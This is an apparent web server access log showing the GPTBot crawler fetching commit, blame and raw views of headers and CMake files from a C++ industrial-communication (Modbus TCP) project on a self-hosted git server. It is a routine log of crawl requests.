-[17/Feb/2026:15:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11398] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13298] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12047] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11367] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11267] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15179] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11607] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9991] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9989] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10212] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 11292] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10684] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16829] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10816] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10237] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21642] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10654] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10221] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13863] [Gzip 7.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 10683] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10444] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 546] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10444] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 10414] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12049] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 1524] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:15:45:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12049] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13336] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 